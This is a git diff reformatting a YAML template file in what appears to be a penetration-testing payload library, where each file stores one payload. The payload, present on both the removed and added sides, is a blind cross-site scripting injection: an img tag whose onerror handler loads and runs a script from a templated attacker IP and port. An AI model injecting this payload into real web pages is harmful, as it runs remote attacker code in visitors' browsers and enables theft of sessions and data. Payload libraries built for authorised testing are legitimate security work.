--- a/src/profi/templates/payloads/xss-blind-img-onerror-include-script-download-insert-head.yaml
+++ b/src/profi/templates/payloads/xss-blind-img-onerror-include-script-download-insert-head.yaml
@@ -1,11 +1,9 @@
+---
 metadata:
-  filename: xss-blind-img-onerror-include-script-download-insert-head.yaml
-  tags:
-  - web
-  - xss
-  created: '2025-03-29'
-  author: Unknown
-content: '<img src=x onerror="var script1=document.createElement(''script'');script1.src=''http://{{
-  attacker_ip }}:{{ delivery_outbound_port }}/<scriptname.js>'';document.head.appendChild(script1);"/>
+  filename: "xss-blind-img-onerror-include-script-download-insert-head.yaml"
+  tags: ["web", "xss"]
+  created: "2025-03-29"
+  author: "Unknown"
 
-  '
+content: |
+  <img src=x onerror="var script1=document.createElement('script');script1.src='http://{{ attacker_ip }}:{{ delivery_outbound_port }}/<scriptname.js>';document.head.appendChild(script1);"/>
